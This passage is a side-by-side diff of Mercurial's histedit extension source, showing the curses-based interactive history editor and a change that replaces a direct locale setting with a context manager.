1305 newpos = max(0, oldpos - 1)
1307 movecursor(state, oldpos, newpos)
1306 movecursor(state, oldpos, newpos)
1308 if selected is not None or action == b'move-up':
1307 if selected is not None or action == b'move-up':
1309 swap(state, oldpos, newpos)
1308 swap(state, oldpos, newpos)
1310 elif action == b'next-action':
1309 elif action == b'next-action':
1311 cycleaction(state, oldpos, next=True)
1310 cycleaction(state, oldpos, next=True)
1312 elif action == b'prev-action':
1311 elif action == b'prev-action':
1313 cycleaction(state, oldpos, next=False)
1312 cycleaction(state, oldpos, next=False)
1314 elif action == b'select':
1313 elif action == b'select':
1315 selected = oldpos if selected is None else None
1314 selected = oldpos if selected is None else None
1316 makeselection(state, selected)
1315 makeselection(state, selected)
1317 elif action == b'goto' and int(ch) < len(rules) and len(rules) <= 10:
1316 elif action == b'goto' and int(ch) < len(rules) and len(rules) <= 10:
1318 newrule = next((r for r in rules if r.origpos == int(ch)))
1317 newrule = next((r for r in rules if r.origpos == int(ch)))
1319 movecursor(state, oldpos, newrule.pos)
1318 movecursor(state, oldpos, newrule.pos)
1320 if selected is not None:
1319 if selected is not None:
1321 swap(state, oldpos, newrule.pos)
1320 swap(state, oldpos, newrule.pos)
1322 elif action.startswith(b'action-'):
1321 elif action.startswith(b'action-'):
1323 changeaction(state, oldpos, action[7:])
1322 changeaction(state, oldpos, action[7:])
1324 elif action == b'showpatch':
1323 elif action == b'showpatch':
1325 changemode(state, MODE_PATCH if curmode != MODE_PATCH else prevmode)
1324 changemode(state, MODE_PATCH if curmode != MODE_PATCH else prevmode)
1326 elif action == b'help':
1325 elif action == b'help':
1327 changemode(state, MODE_HELP if curmode != MODE_HELP else prevmode)
1326 changemode(state, MODE_HELP if curmode != MODE_HELP else prevmode)
1328 elif action == b'quit':
1327 elif action == b'quit':
1329 return E_QUIT
1328 return E_QUIT
1330 elif action == b'histedit':
1329 elif action == b'histedit':
1331 return E_HISTEDIT
1330 return E_HISTEDIT
1332 elif action == b'page-down':
1331 elif action == b'page-down':
1333 return E_PAGEDOWN
1332 return E_PAGEDOWN
1334 elif action == b'page-up':
1333 elif action == b'page-up':
1335 return E_PAGEUP
1334 return E_PAGEUP
1336 elif action == b'line-down':
1335 elif action == b'line-down':
1337 return E_LINEDOWN
1336 return E_LINEDOWN
1338 elif action == b'line-up':
1337 elif action == b'line-up':
1339 return E_LINEUP
1338 return E_LINEUP
1340
1339
1341
1340
1342 def makecommands(rules):
1341 def makecommands(rules):
1343 """Returns a list of commands consumable by histedit --commands based on
1342 """Returns a list of commands consumable by histedit --commands based on
1344 our list of rules"""
1343 our list of rules"""
1345 commands = []
1344 commands = []
1346 for rules in rules:
1345 for rules in rules:
1347 commands.append(b'%s %s\n' % (rules.action, rules.ctx))
1346 commands.append(b'%s %s\n' % (rules.action, rules.ctx))
1348 return commands
1347 return commands
1349
1348
1350
1349
1351 def addln(win, y, x, line, color=None):
1350 def addln(win, y, x, line, color=None):
1352 """Add a line to the given window left padding but 100% filled with
1351 """Add a line to the given window left padding but 100% filled with
1353 whitespace characters, so that the color appears on the whole line"""
1352 whitespace characters, so that the color appears on the whole line"""
1354 maxy, maxx = win.getmaxyx()
1353 maxy, maxx = win.getmaxyx()
1355 length = maxx - 1 - x
1354 length = maxx - 1 - x
1356 line = bytes(line).ljust(length)[:length]
1355 line = bytes(line).ljust(length)[:length]
1357 if y < 0:
1356 if y < 0:
1358 y = maxy + y
1357 y = maxy + y
1359 if x < 0:
1358 if x < 0:
1360 x = maxx + x
1359 x = maxx + x
1361 if color:
1360 if color:
1362 win.addstr(y, x, line, color)
1361 win.addstr(y, x, line, color)
1363 else:
1362 else:
1364 win.addstr(y, x, line)
1363 win.addstr(y, x, line)
1365
1364
1366
1365
1367 def _trunc_head(line, n):
1366 def _trunc_head(line, n):
1368 if len(line) <= n:
1367 if len(line) <= n:
1369 return line
1368 return line
1370 return b'> ' + line[-(n - 2) :]
1369 return b'> ' + line[-(n - 2) :]
1371
1370
1372
1371
1373 def _trunc_tail(line, n):
1372 def _trunc_tail(line, n):
1374 if len(line) <= n:
1373 if len(line) <= n:
1375 return line
1374 return line
1376 return line[: n - 2] + b' >'
1375 return line[: n - 2] + b' >'
1377
1376
1378
1377
1379 def patchcontents(state):
1378 def patchcontents(state):
1380 repo = state[b'repo']
1379 repo = state[b'repo']
1381 rule = state[b'rules'][state[b'pos']]
1380 rule = state[b'rules'][state[b'pos']]
1382 displayer = logcmdutil.changesetdisplayer(
1381 displayer = logcmdutil.changesetdisplayer(
1383 repo.ui, repo, {b"patch": True, b"template": b"status"}, buffered=True
1382 repo.ui, repo, {b"patch": True, b"template": b"status"}, buffered=True
1384 )
1383 )
1385 overrides = {(b'ui', b'verbose'): True}
1384 overrides = {(b'ui', b'verbose'): True}
1386 with repo.ui.configoverride(overrides, source=b'histedit'):
1385 with repo.ui.configoverride(overrides, source=b'histedit'):
1387 displayer.show(rule.ctx)
1386 displayer.show(rule.ctx)
1388 displayer.close()
1387 displayer.close()
1389 return displayer.hunk[rule.ctx.rev()].splitlines()
1388 return displayer.hunk[rule.ctx.rev()].splitlines()
1390
1389
1391
1390
1392 def _chisteditmain(repo, rules, stdscr):
1391 def _chisteditmain(repo, rules, stdscr):
1393 try:
1392 try:
1394 curses.use_default_colors()
1393 curses.use_default_colors()
1395 except curses.error:
1394 except curses.error:
1396 pass
1395 pass
1397
1396
1398 # initialize color pattern
1397 # initialize color pattern
1399 curses.init_pair(COLOR_HELP, curses.COLOR_WHITE, curses.COLOR_BLUE)
1398 curses.init_pair(COLOR_HELP, curses.COLOR_WHITE, curses.COLOR_BLUE)
1400 curses.init_pair(COLOR_SELECTED, curses.COLOR_BLACK, curses.COLOR_WHITE)
1399 curses.init_pair(COLOR_SELECTED, curses.COLOR_BLACK, curses.COLOR_WHITE)
1401 curses.init_pair(COLOR_WARN, curses.COLOR_BLACK, curses.COLOR_YELLOW)
1400 curses.init_pair(COLOR_WARN, curses.COLOR_BLACK, curses.COLOR_YELLOW)
1402 curses.init_pair(COLOR_OK, curses.COLOR_BLACK, curses.COLOR_GREEN)
1401 curses.init_pair(COLOR_OK, curses.COLOR_BLACK, curses.COLOR_GREEN)
1403 curses.init_pair(COLOR_CURRENT, curses.COLOR_WHITE, curses.COLOR_MAGENTA)
1402 curses.init_pair(COLOR_CURRENT, curses.COLOR_WHITE, curses.COLOR_MAGENTA)
1404 curses.init_pair(COLOR_DIFF_ADD_LINE, curses.COLOR_GREEN, -1)
1403 curses.init_pair(COLOR_DIFF_ADD_LINE, curses.COLOR_GREEN, -1)
1405 curses.init_pair(COLOR_DIFF_DEL_LINE, curses.COLOR_RED, -1)
1404 curses.init_pair(COLOR_DIFF_DEL_LINE, curses.COLOR_RED, -1)
1406 curses.init_pair(COLOR_DIFF_OFFSET, curses.COLOR_MAGENTA, -1)
1405 curses.init_pair(COLOR_DIFF_OFFSET, curses.COLOR_MAGENTA, -1)
1407 curses.init_pair(COLOR_ROLL, curses.COLOR_RED, -1)
1406 curses.init_pair(COLOR_ROLL, curses.COLOR_RED, -1)
1408 curses.init_pair(
1407 curses.init_pair(
1409 COLOR_ROLL_CURRENT, curses.COLOR_BLACK, curses.COLOR_MAGENTA
1408 COLOR_ROLL_CURRENT, curses.COLOR_BLACK, curses.COLOR_MAGENTA
1410 )
1409 )
1411 curses.init_pair(COLOR_ROLL_SELECTED, curses.COLOR_RED, curses.COLOR_WHITE)
1410 curses.init_pair(COLOR_ROLL_SELECTED, curses.COLOR_RED, curses.COLOR_WHITE)
1412
1411
1413 # don't display the cursor
1412 # don't display the cursor
1414 try:
1413 try:
1415 curses.curs_set(0)
1414 curses.curs_set(0)
1416 except curses.error:
1415 except curses.error:
1417 pass
1416 pass
1418
1417
1419 def rendercommit(win, state):
1418 def rendercommit(win, state):
1420 """Renders the commit window that shows the log of the current selected
1419 """Renders the commit window that shows the log of the current selected
1421 commit"""
1420 commit"""
1422 pos = state[b'pos']
1421 pos = state[b'pos']
1423 rules = state[b'rules']
1422 rules = state[b'rules']
1424 rule = rules[pos]
1423 rule = rules[pos]
1425
1424
1426 ctx = rule.ctx
1425 ctx = rule.ctx
1427 win.box()
1426 win.box()
1428
1427
1429 maxy, maxx = win.getmaxyx()
1428 maxy, maxx = win.getmaxyx()
1430 length = maxx - 3
1429 length = maxx - 3
1431
1430
1432 line = b"changeset: %d:%s" % (ctx.rev(), ctx.hex()[:12])
1431 line = b"changeset: %d:%s" % (ctx.rev(), ctx.hex()[:12])
1433 win.addstr(1, 1, line[:length])
1432 win.addstr(1, 1, line[:length])
1434
1433
1435 line = b"user: %s" % ctx.user()
1434 line = b"user: %s" % ctx.user()
1436 win.addstr(2, 1, line[:length])
1435 win.addstr(2, 1, line[:length])
1437
1436
1438 bms = repo.nodebookmarks(ctx.node())
1437 bms = repo.nodebookmarks(ctx.node())
1439 line = b"bookmark: %s" % b' '.join(bms)
1438 line = b"bookmark: %s" % b' '.join(bms)
1440 win.addstr(3, 1, line[:length])
1439 win.addstr(3, 1, line[:length])
1441
1440
1442 line = b"summary: %s" % (ctx.description().splitlines()[0])
1441 line = b"summary: %s" % (ctx.description().splitlines()[0])
1443 win.addstr(4, 1, line[:length])
1442 win.addstr(4, 1, line[:length])
1444
1443
1445 line = b"files: "
1444 line = b"files: "
1446 win.addstr(5, 1, line)
1445 win.addstr(5, 1, line)
1447 fnx = 1 + len(line)
1446 fnx = 1 + len(line)
1448 fnmaxx = length - fnx + 1
1447 fnmaxx = length - fnx + 1
1449 y = 5
1448 y = 5
1450 fnmaxn = maxy - (1 + y) - 1
1449 fnmaxn = maxy - (1 + y) - 1
1451 files = ctx.files()
1450 files = ctx.files()
1452 for i, line1 in enumerate(files):
1451 for i, line1 in enumerate(files):
1453 if len(files) > fnmaxn and i == fnmaxn - 1:
1452 if len(files) > fnmaxn and i == fnmaxn - 1:
1454 win.addstr(y, fnx, _trunc_tail(b','.join(files[i:]), fnmaxx))
1453 win.addstr(y, fnx, _trunc_tail(b','.join(files[i:]), fnmaxx))
1455 y = y + 1
1454 y = y + 1
1456 break
1455 break
1457 win.addstr(y, fnx, _trunc_head(line1, fnmaxx))
1456 win.addstr(y, fnx, _trunc_head(line1, fnmaxx))
1458 y = y + 1
1457 y = y + 1
1459
1458
1460 conflicts = rule.conflicts
1459 conflicts = rule.conflicts
1461 if len(conflicts) > 0:
1460 if len(conflicts) > 0:
1462 conflictstr = b','.join(map(lambda r: r.ctx.hex()[:12], conflicts))
1461 conflictstr = b','.join(map(lambda r: r.ctx.hex()[:12], conflicts))
1463 conflictstr = b"changed files overlap with %s" % conflictstr
1462 conflictstr = b"changed files overlap with %s" % conflictstr
1464 else:
1463 else:
1465 conflictstr = b'no overlap'
1464 conflictstr = b'no overlap'
1466
1465
1467 win.addstr(y, 1, conflictstr[:length])
1466 win.addstr(y, 1, conflictstr[:length])
1468 win.noutrefresh()
1467 win.noutrefresh()
1469
1468
1470 def helplines(mode):
1469 def helplines(mode):
1471 if mode == MODE_PATCH:
1470 if mode == MODE_PATCH:
1472 help = b"""\
1471 help = b"""\
1473 ?: help, k/up: line up, j/down: line down, v: stop viewing patch
1472 ?: help, k/up: line up, j/down: line down, v: stop viewing patch
1474 pgup: prev page, space/pgdn: next page, c: commit, q: abort
1473 pgup: prev page, space/pgdn: next page, c: commit, q: abort
1475 """
1474 """
1476 else:
1475 else:
1477 help = b"""\
1476 help = b"""\
1478 ?: help, k/up: move up, j/down: move down, space: select, v: view patch
1477 ?: help, k/up: move up, j/down: move down, space: select, v: view patch
1479 d: drop, e: edit, f: fold, m: mess, p: pick, r: roll
1478 d: drop, e: edit, f: fold, m: mess, p: pick, r: roll
1480 pgup/K: move patch up, pgdn/J: move patch down, c: commit, q: abort
1479 pgup/K: move patch up, pgdn/J: move patch down, c: commit, q: abort
1481 """
1480 """
1482 return help.splitlines()
1481 return help.splitlines()
1483
1482
1484 def renderhelp(win, state):
1483 def renderhelp(win, state):
1485 maxy, maxx = win.getmaxyx()
1484 maxy, maxx = win.getmaxyx()
1486 mode, _ = state[b'mode']
1485 mode, _ = state[b'mode']
1487 for y, line in enumerate(helplines(mode)):
1486 for y, line in enumerate(helplines(mode)):
1488 if y >= maxy:
1487 if y >= maxy:
1489 break
1488 break
1490 addln(win, y, 0, line, curses.color_pair(COLOR_HELP))
1489 addln(win, y, 0, line, curses.color_pair(COLOR_HELP))
1491 win.noutrefresh()
1490 win.noutrefresh()
1492
1491
1493 def renderrules(rulesscr, state):
1492 def renderrules(rulesscr, state):
1494 rules = state[b'rules']
1493 rules = state[b'rules']
1495 pos = state[b'pos']
1494 pos = state[b'pos']
1496 selected = state[b'selected']
1495 selected = state[b'selected']
1497 start = state[b'modes'][MODE_RULES][b'line_offset']
1496 start = state[b'modes'][MODE_RULES][b'line_offset']
1498
1497
1499 conflicts = [r.ctx for r in rules if r.conflicts]
1498 conflicts = [r.ctx for r in rules if r.conflicts]
1500 if len(conflicts) > 0:
1499 if len(conflicts) > 0:
1501 line = b"potential conflict in %s" % b','.join(
1500 line = b"potential conflict in %s" % b','.join(
1502 map(pycompat.bytestr, conflicts)
1501 map(pycompat.bytestr, conflicts)
1503 )
1502 )
1504 addln(rulesscr, -1, 0, line, curses.color_pair(COLOR_WARN))
1503 addln(rulesscr, -1, 0, line, curses.color_pair(COLOR_WARN))
1505
1504
1506 for y, rule in enumerate(rules[start:]):
1505 for y, rule in enumerate(rules[start:]):
1507 if y >= state[b'page_height']:
1506 if y >= state[b'page_height']:
1508 break
1507 break
1509 if len(rule.conflicts) > 0:
1508 if len(rule.conflicts) > 0:
1510 rulesscr.addstr(y, 0, b" ", curses.color_pair(COLOR_WARN))
1509 rulesscr.addstr(y, 0, b" ", curses.color_pair(COLOR_WARN))
1511 else:
1510 else:
1512 rulesscr.addstr(y, 0, b" ", curses.COLOR_BLACK)
1511 rulesscr.addstr(y, 0, b" ", curses.COLOR_BLACK)
1513
1512
1514 if y + start == selected:
1513 if y + start == selected:
1515 rollcolor = COLOR_ROLL_SELECTED
1514 rollcolor = COLOR_ROLL_SELECTED
1516 addln(rulesscr, y, 2, rule, curses.color_pair(COLOR_SELECTED))
1515 addln(rulesscr, y, 2, rule, curses.color_pair(COLOR_SELECTED))
1517 elif y + start == pos:
1516 elif y + start == pos:
1518 rollcolor = COLOR_ROLL_CURRENT
1517 rollcolor = COLOR_ROLL_CURRENT
1519 addln(
1518 addln(
1520 rulesscr,
1519 rulesscr,
1521 y,
1520 y,
1522 2,
1521 2,
1523 rule,
1522 rule,
1524 curses.color_pair(COLOR_CURRENT) | curses.A_BOLD,
1523 curses.color_pair(COLOR_CURRENT) | curses.A_BOLD,
1525 )
1524 )
1526 else:
1525 else:
1527 rollcolor = COLOR_ROLL
1526 rollcolor = COLOR_ROLL
1528 addln(rulesscr, y, 2, rule)
1527 addln(rulesscr, y, 2, rule)
1529
1528
1530 if rule.action == b'roll':
1529 if rule.action == b'roll':
1531 rulesscr.addstr(
1530 rulesscr.addstr(
1532 y,
1531 y,
1533 2 + len(rule.prefix),
1532 2 + len(rule.prefix),
1534 rule.desc,
1533 rule.desc,
1535 curses.color_pair(rollcolor),
1534 curses.color_pair(rollcolor),
1536 )
1535 )
1537
1536
1538 rulesscr.noutrefresh()
1537 rulesscr.noutrefresh()
1539
1538
1540 def renderstring(win, state, output, diffcolors=False):
1539 def renderstring(win, state, output, diffcolors=False):
1541 maxy, maxx = win.getmaxyx()
1540 maxy, maxx = win.getmaxyx()
1542 length = min(maxy - 1, len(output))
1541 length = min(maxy - 1, len(output))
1543 for y in range(0, length):
1542 for y in range(0, length):
1544 line = output[y]
1543 line = output[y]
1545 if diffcolors:
1544 if diffcolors:
1546 if line and line[0] == b'+':
1545 if line and line[0] == b'+':
1547 win.addstr(
1546 win.addstr(
1548 y, 0, line, curses.color_pair(COLOR_DIFF_ADD_LINE)
1547 y, 0, line, curses.color_pair(COLOR_DIFF_ADD_LINE)
1549 )
1548 )
1550 elif line and line[0] == b'-':
1549 elif line and line[0] == b'-':
1551 win.addstr(
1550 win.addstr(
1552 y, 0, line, curses.color_pair(COLOR_DIFF_DEL_LINE)
1551 y, 0, line, curses.color_pair(COLOR_DIFF_DEL_LINE)
1553 )
1552 )
1554 elif line.startswith(b'@@ '):
1553 elif line.startswith(b'@@ '):
1555 win.addstr(y, 0, line, curses.color_pair(COLOR_DIFF_OFFSET))
1554 win.addstr(y, 0, line, curses.color_pair(COLOR_DIFF_OFFSET))
1556 else:
1555 else:
1557 win.addstr(y, 0, line)
1556 win.addstr(y, 0, line)
1558 else:
1557 else:
1559 win.addstr(y, 0, line)
1558 win.addstr(y, 0, line)
1560 win.noutrefresh()
1559 win.noutrefresh()
1561
1560
1562 def renderpatch(win, state):
1561 def renderpatch(win, state):
1563 start = state[b'modes'][MODE_PATCH][b'line_offset']
1562 start = state[b'modes'][MODE_PATCH][b'line_offset']
1564 content = state[b'modes'][MODE_PATCH][b'patchcontents']
1563 content = state[b'modes'][MODE_PATCH][b'patchcontents']
1565 renderstring(win, state, content[start:], diffcolors=True)
1564 renderstring(win, state, content[start:], diffcolors=True)
1566
1565
1567 def layout(mode):
1566 def layout(mode):
1568 maxy, maxx = stdscr.getmaxyx()
1567 maxy, maxx = stdscr.getmaxyx()
1569 helplen = len(helplines(mode))
1568 helplen = len(helplines(mode))
1570 return {
1569 return {
1571 b'commit': (12, maxx),
1570 b'commit': (12, maxx),
1572 b'help': (helplen, maxx),
1571 b'help': (helplen, maxx),
1573 b'main': (maxy - helplen - 12, maxx),
1572 b'main': (maxy - helplen - 12, maxx),
1574 }
1573 }
1575
1574
1576 def drawvertwin(size, y, x):
1575 def drawvertwin(size, y, x):
1577 win = curses.newwin(size[0], size[1], y, x)
1576 win = curses.newwin(size[0], size[1], y, x)
1578 y += size[0]
1577 y += size[0]
1579 return win, y, x
1578 return win, y, x
1580
1579
1581 state = {
1580 state = {
1582 b'pos': 0,
1581 b'pos': 0,
1583 b'rules': rules,
1582 b'rules': rules,
1584 b'selected': None,
1583 b'selected': None,
1585 b'mode': (MODE_INIT, MODE_INIT),
1584 b'mode': (MODE_INIT, MODE_INIT),
1586 b'page_height': None,
1585 b'page_height': None,
1587 b'modes': {
1586 b'modes': {
1588 MODE_RULES: {b'line_offset': 0,},
1587 MODE_RULES: {b'line_offset': 0,},
1589 MODE_PATCH: {b'line_offset': 0,},
1588 MODE_PATCH: {b'line_offset': 0,},
1590 },
1589 },
1591 b'repo': repo,
1590 b'repo': repo,
1592 }
1591 }
1593
1592
1594 # eventloop
1593 # eventloop
1595 ch = None
1594 ch = None
1596 stdscr.clear()
1595 stdscr.clear()
1597 stdscr.refresh()
1596 stdscr.refresh()
1598 while True:
1597 while True:
1599 try:
1598 try:
1600 oldmode, _ = state[b'mode']
1599 oldmode, _ = state[b'mode']
1601 if oldmode == MODE_INIT:
1600 if oldmode == MODE_INIT:
1602 changemode(state, MODE_RULES)
1601 changemode(state, MODE_RULES)
1603 e = event(state, ch)
1602 e = event(state, ch)
1604
1603
1605 if e == E_QUIT:
1604 if e == E_QUIT:
1606 return False
1605 return False
1607 if e == E_HISTEDIT:
1606 if e == E_HISTEDIT:
1608 return state[b'rules']
1607 return state[b'rules']
1609 else:
1608 else:
1610 if e == E_RESIZE:
1609 if e == E_RESIZE:
1611 size = screen_size()
1610 size = screen_size()
1612 if size != stdscr.getmaxyx():
1611 if size != stdscr.getmaxyx():
1613 curses.resizeterm(*size)
1612 curses.resizeterm(*size)
1614
1613
1615 curmode, _ = state[b'mode']
1614 curmode, _ = state[b'mode']
1616 sizes = layout(curmode)
1615 sizes = layout(curmode)
1617 if curmode != oldmode:
1616 if curmode != oldmode:
1618 state[b'page_height'] = sizes[b'main'][0]
1617 state[b'page_height'] = sizes[b'main'][0]
1619 # Adjust the view to fit the current screen size.
1618 # Adjust the view to fit the current screen size.
1620 movecursor(state, state[b'pos'], state[b'pos'])
1619 movecursor(state, state[b'pos'], state[b'pos'])
1621
1620
1622 # Pack the windows against the top, each pane spread across the
1621 # Pack the windows against the top, each pane spread across the
1623 # full width of the screen.
1622 # full width of the screen.
1624 y, x = (0, 0)
1623 y, x = (0, 0)
1625 helpwin, y, x = drawvertwin(sizes[b'help'], y, x)
1624 helpwin, y, x = drawvertwin(sizes[b'help'], y, x)
1626 mainwin, y, x = drawvertwin(sizes[b'main'], y, x)
1625 mainwin, y, x = drawvertwin(sizes[b'main'], y, x)
1627 commitwin, y, x = drawvertwin(sizes[b'commit'], y, x)
1626 commitwin, y, x = drawvertwin(sizes[b'commit'], y, x)
1628
1627
1629 if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP):
1628 if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP):
1630 if e == E_PAGEDOWN:
1629 if e == E_PAGEDOWN:
1631 changeview(state, +1, b'page')
1630 changeview(state, +1, b'page')
1632 elif e == E_PAGEUP:
1631 elif e == E_PAGEUP:
1633 changeview(state, -1, b'page')
1632 changeview(state, -1, b'page')
1634 elif e == E_LINEDOWN:
1633 elif e == E_LINEDOWN:
1635 changeview(state, +1, b'line')
1634 changeview(state, +1, b'line')
1636 elif e == E_LINEUP:
1635 elif e == E_LINEUP:
1637 changeview(state, -1, b'line')
1636 changeview(state, -1, b'line')
1638
1637
1639 # start rendering
1638 # start rendering
1640 commitwin.erase()
1639 commitwin.erase()
1641 helpwin.erase()
1640 helpwin.erase()
1642 mainwin.erase()
1641 mainwin.erase()
1643 if curmode == MODE_PATCH:
1642 if curmode == MODE_PATCH:
1644 renderpatch(mainwin, state)
1643 renderpatch(mainwin, state)
1645 elif curmode == MODE_HELP:
1644 elif curmode == MODE_HELP:
1646 renderstring(mainwin, state, __doc__.strip().splitlines())
1645 renderstring(mainwin, state, __doc__.strip().splitlines())
1647 else:
1646 else:
1648 renderrules(mainwin, state)
1647 renderrules(mainwin, state)
1649 rendercommit(commitwin, state)
1648 rendercommit(commitwin, state)
1650 renderhelp(helpwin, state)
1649 renderhelp(helpwin, state)
1651 curses.doupdate()
1650 curses.doupdate()
1652 # done rendering
1651 # done rendering
1653 ch = encoding.strtolocal(stdscr.getkey())
1652 ch = encoding.strtolocal(stdscr.getkey())
1654 except curses.error:
1653 except curses.error:
1655 pass
1654 pass
1656
1655
1657
1656
1658 def _chistedit(ui, repo, freeargs, opts):
1657 def _chistedit(ui, repo, freeargs, opts):
1659 """interactively edit changeset history via a curses interface
1658 """interactively edit changeset history via a curses interface
1660
1659
1661 Provides a ncurses interface to histedit. Press ? in chistedit mode
1660 Provides a ncurses interface to histedit. Press ? in chistedit mode
1662 to see an extensive help. Requires python-curses to be installed."""
1661 to see an extensive help. Requires python-curses to be installed."""
1663
1662
1664 if curses is None:
1663 if curses is None:
1665 raise error.Abort(_(b"Python curses library required"))
1664 raise error.Abort(_(b"Python curses library required"))
1666
1665
1667 # disable color
1666 # disable color
1668 ui._colormode = None
1667 ui._colormode = None
1669
1668
1670 try:
1669 try:
1671 keep = opts.get(b'keep')
1670 keep = opts.get(b'keep')
1672 revs = opts.get(b'rev', [])[:]
1671 revs = opts.get(b'rev', [])[:]
1673 cmdutil.checkunfinished(repo)
1672 cmdutil.checkunfinished(repo)
1674 cmdutil.bailifchanged(repo)
1673 cmdutil.bailifchanged(repo)
1675
1674
1676 if os.path.exists(os.path.join(repo.path, b'histedit-state')):
1675 if os.path.exists(os.path.join(repo.path, b'histedit-state')):
1677 raise error.Abort(
1676 raise error.Abort(
1678 _(
1677 _(
1679 b'history edit already in progress, try '
1678 b'history edit already in progress, try '
1680 b'--continue or --abort'
1679 b'--continue or --abort'
1681 )
1680 )
1682 )
1681 )
1683 revs.extend(freeargs)
1682 revs.extend(freeargs)
1684 if not revs:
1683 if not revs:
1685 defaultrev = destutil.desthistedit(ui, repo)
1684 defaultrev = destutil.desthistedit(ui, repo)
1686 if defaultrev is not None:
1685 if defaultrev is not None:
1687 revs.append(defaultrev)
1686 revs.append(defaultrev)
1688 if len(revs) != 1:
1687 if len(revs) != 1:
1689 raise error.Abort(
1688 raise error.Abort(
1690 _(b'histedit requires exactly one ancestor revision')
1689 _(b'histedit requires exactly one ancestor revision')
1691 )
1690 )
1692
1691
1693 rr = list(repo.set(b'roots(%ld)', scmutil.revrange(repo, revs)))
1692 rr = list(repo.set(b'roots(%ld)', scmutil.revrange(repo, revs)))
1694 if len(rr) != 1:
1693 if len(rr) != 1:
1695 raise error.Abort(
1694 raise error.Abort(
1696 _(
1695 _(
1697 b'The specified revisions must have '
1696 b'The specified revisions must have '
1698 b'exactly one common root'
1697 b'exactly one common root'
1699 )
1698 )
1700 )
1699 )
1701 root = rr[0].node()
1700 root = rr[0].node()
1702
1701
1703 topmost = repo.dirstate.p1()
1702 topmost = repo.dirstate.p1()
1704 revs = between(repo, root, topmost, keep)
1703 revs = between(repo, root, topmost, keep)
1705 if not revs:
1704 if not revs:
1706 raise error.Abort(
1705 raise error.Abort(
1707 _(b'%s is not an ancestor of working directory')
1706 _(b'%s is not an ancestor of working directory')
1708 % node.short(root)
1707 % node.short(root)
1709 )
1708 )
1710
1709
1711 ctxs = []
1710 ctxs = []
1712 for i, r in enumerate(revs):
1711 for i, r in enumerate(revs):
1713 ctxs.append(histeditrule(ui, repo[r], i))
1712 ctxs.append(histeditrule(ui, repo[r], i))
1714 # Curses requires setting the locale or it will default to the C
1713 with util.with_lc_ctype():
1715 # locale. This sets the locale to the user's default system
1714 rc = curses.wrapper(functools.partial(_chisteditmain, repo, ctxs))
1716 # locale.
1717 locale.setlocale(locale.LC_ALL, '')
1718 rc = curses.wrapper(functools.partial(_chisteditmain, repo, ctxs))
1719 curses.echo()
1715 curses.echo()
1720 curses.endwin()
1716 curses.endwin()
1721 if rc is False:
1717 if rc is False:
1722 ui.write(_(b"histedit aborted\n"))
1718 ui.write(_(b"histedit aborted\n"))
1723 return 0
1719 return 0
1724 if type(rc) is list:
1720 if type(rc) is list:
1725 ui.status(_(b"performing changes\n"))
1721 ui.status(_(b"performing changes\n"))
1726 rules = makecommands(rc)
1722 rules = makecommands(rc)
1727 with repo.vfs(b'chistedit', b'w+') as fp:
1723 with repo.vfs(b'chistedit', b'w+') as fp:
1728 for r in rules:
1724 for r in rules:
1729 fp.write(r)
1725 fp.write(r)
1730 opts[b'commands'] = fp.name
1726 opts[b'commands'] = fp.name
1731 return _texthistedit(ui, repo, freeargs, opts)
1727 return _texthistedit(ui, repo, freeargs, opts)
1732 except KeyboardInterrupt:
1728 except KeyboardInterrupt:
1733 pass
1729 pass
1734 return -1
1730 return -1
1735
1731
1736
1732
1737 @command(
1733 @command(
1738 b'histedit',
1734 b'histedit',
1739 [
1735 [
1740 (
1736 (
1741 b'',
1737 b'',
1742 b'commands',
1738 b'commands',
1743 b'',
1739 b'',
1744 _(b'read history edits from the specified file'),
1740 _(b'read history edits from the specified file'),
1745 _(b'FILE'),
1741 _(b'FILE'),
1746 ),
1742 ),
1747 (b'c', b'continue', False, _(b'continue an edit already in progress')),
1743 (b'c', b'continue', False, _(b'continue an edit already in progress')),
1748 (b'', b'edit-plan', False, _(b'edit remaining actions list')),
1744 (b'', b'edit-plan', False, _(b'edit remaining actions list')),
1749 (
1745 (
1750 b'k',
1746 b'k',
1751 b'keep',
1747 b'keep',
1752 False,
1748 False,
1753 _(b"don't strip old nodes after edit is complete"),
1749 _(b"don't strip old nodes after edit is complete"),
1754 ),
1750 ),
1755 (b'', b'abort', False, _(b'abort an edit in progress')),
1751 (b'', b'abort', False, _(b'abort an edit in progress')),
1756 (b'o', b'outgoing', False, _(b'changesets not found in destination')),
1752 (b'o', b'outgoing', False, _(b'changesets not found in destination')),
1757 (
1753 (
1758 b'f',
1754 b'f',
1759 b'force',
1755 b'force',
1760 False,
1756 False,
1761 _(b'force outgoing even for unrelated repositories'),
1757 _(b'force outgoing even for unrelated repositories'),
1762 ),
1758 ),
1763 (b'r', b'rev', [], _(b'first revision to be edited'), _(b'REV')),
1759 (b'r', b'rev', [], _(b'first revision to be edited'), _(b'REV')),
1764 ]
1760 ]
1765 + cmdutil.formatteropts,
1761 + cmdutil.formatteropts,
1766 _(b"[OPTIONS] ([ANCESTOR] | --outgoing [URL])"),
1762 _(b"[OPTIONS] ([ANCESTOR] | --outgoing [URL])"),
1767 helpcategory=command.CATEGORY_CHANGE_MANAGEMENT,
1763 helpcategory=command.CATEGORY_CHANGE_MANAGEMENT,
1768 )
1764 )
1769 def histedit(ui, repo, *freeargs, **opts):
1765 def histedit(ui, repo, *freeargs, **opts):
1770 """interactively edit changeset history
1766 """interactively edit changeset history
1771
1767
1772 This command lets you edit a linear series of changesets (up to
1768 This command lets you edit a linear series of changesets (up to
1773 and including the working directory, which should be clean).
1769 and including the working directory, which should be clean).
1774 You can:
1770 You can:
1775
1771
1776 - `pick` to [re]order a changeset
1772 - `pick` to [re]order a changeset
1777
1773
1778 - `drop` to omit changeset
1774 - `drop` to omit changeset
1779
1775
1780 - `mess` to reword the changeset commit message
1776 - `mess` to reword the changeset commit message
1781
1777
1782 - `fold` to combine it with the preceding changeset (using the later date)
1778 - `fold` to combine it with the preceding changeset (using the later date)
1783
1779
1784 - `roll` like fold, but discarding this commit's description and date
1780 - `roll` like fold, but discarding this commit's description and date
1785
1781
1786 - `edit` to edit this changeset (preserving date)
1782 - `edit` to edit this changeset (preserving date)
1787
1783
1788 - `base` to checkout changeset and apply further changesets from there
1784 - `base` to checkout changeset and apply further changesets from there
1789
1785
1790 There are a number of ways to select the root changeset:
1786 There are a number of ways to select the root changeset:
1791
1787
1792 - Specify ANCESTOR directly
1788 - Specify ANCESTOR directly
1793
1789
1794 - Use --outgoing -- it will be the first linear changeset not
